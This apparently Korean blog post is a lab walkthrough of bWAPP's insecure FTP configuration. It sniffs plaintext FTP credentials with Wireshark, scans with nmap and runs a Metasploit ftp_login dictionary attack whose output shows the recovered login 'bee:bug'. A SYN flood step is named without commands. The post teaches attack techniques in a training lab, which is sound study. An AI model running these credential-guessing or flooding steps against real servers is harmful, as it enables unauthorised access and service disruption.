Notice
Recent Posts
Recent Comments
Link
«   2024/09   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30
Archives
Today
Total
관리 메뉴

삽질블로그

[Kali_Linux] Insecure FTP Configuration | bWAPP | Security Misconfiguration 본문

카테고리 없음

[Kali_Linux] Insecure FTP Configuration | bWAPP | Security Misconfiguration

삽질장인 2020. 9. 1. 19:16

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

1. Security Misconfiguration

  - 잘못된 보안 구성

  - 서버 / 시스템 / DB / 네트워크 장비 / 웹 설정 오류로 인하여 발생하는 취약점이다.

  - Ex) 디렉토링 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, Dos/DDos공격,

         특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업 / 임시 / robots 파일

 

2. Insecure FTP Configuration

   - FTP 서버 연결시 전송되는 아이디 / 패스워드가 평문으로 전송되기 때문에 MITM에 의한 아이디 / 패스워드 노출이 쉽게 일어난다.

   - 플루트 포스 / 사전 대입 공격을 통해서도 아이디 / 패스워드 크랙에 취약하다.

   - TCP Syn 플러딩 공격에 의해서 서버 네트워크 대역폭 고갈 및 부하 현상이 발생한다.

 

3. Security Misconfiguration - Insecure FTP Configuration

   - 이 시나리오는 FTP 평문 메시지 취약점 확인, 사전대입 공격, DoS 공격을 진행하는 내용이다.

 

==========================실습============================

1) 첫화면

 

2) kali에서 FTP 패키지 설치 실시

   root@kali:~# apt-get install ftp

 

3) bWAPP을 타겟으로 스캐닝 실시

   root@kali:~# nmap -sS -sV 192.168.222.132

 

4) 와이어샤크 실행 및 eh0 캡처 실시

   root@kali:/home/kali# wireshark &

 

5) bWAPP FTP 서버 접속 및 종료 실시

 

6) 와이어샤크 캡처 내용 확인( ID/PASSWORD 확인 가능 )

 

7) 사전 대입 파일 생성 실시

   root@kali:~# vi user.txt

bee
admin
administrator
root

:wq!

   root@kali:~# vi pass.txt

bug
toor
admin
cisco

:wq!

 

8) 메타스플로잇을 이용한 사전 대입 공격 실시

root@kali:~# msfconsole -q

msf5 > search auxiliary/scanner/ftp/ftp_login

Matching Modules
=================
# Name                              Disclosure  Date  Rank    Check  Desription
= ====                              ==========  ====  ====    =====  ==========
0 auxiliary/scanner/ftp/ftp_login                     normal   No    FTP Authentication Scanner

msf5 > use auxiliary/scanner/ftp/ftp_login
msf5 auxiliary(scanner/ftp/ftp_login) > set rhosts 192.168.222.132
rhosts => 192.168.222.132

msf5 auxiliary(scanner/ftp/ftp_login) > set user_file /root/user.txt
user_file => /root/user.txt

msf5 auxiliary(scanner/ftp/ftp_login) > set pass_file /root/pass.txt
pass_file => /root/pass.txt

msf5 auxiliary(scanner/ftp/ftp_login) > set stop_on_success true
stop_on_success => true
msf5 auxiliary(scanner/ftp/ftp_login) > exploit

[*] 192.168.222.132:21    - 192.168.222.132:21 - Starting FTP login sweep
[!] 192.168.222.132:21    - No active DB -- Credential data will not be saved!
[+] 192.168.222.132:21    - 192.168.222.132:21 - Login Successful: bee:bug
[*] 192.168.222.132:21    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf5 auxiliary(scanner/ftp/ftp_login) > quit

 

9) bWAPP에서 시스템 모니터링 도구 실행

   bee@bee-box:~$ gnome-system-monitor &

 

10) TCP SYN 플러딩 공격 실시

 

 

11) bWAPP 부하 발생 확인

 

Comments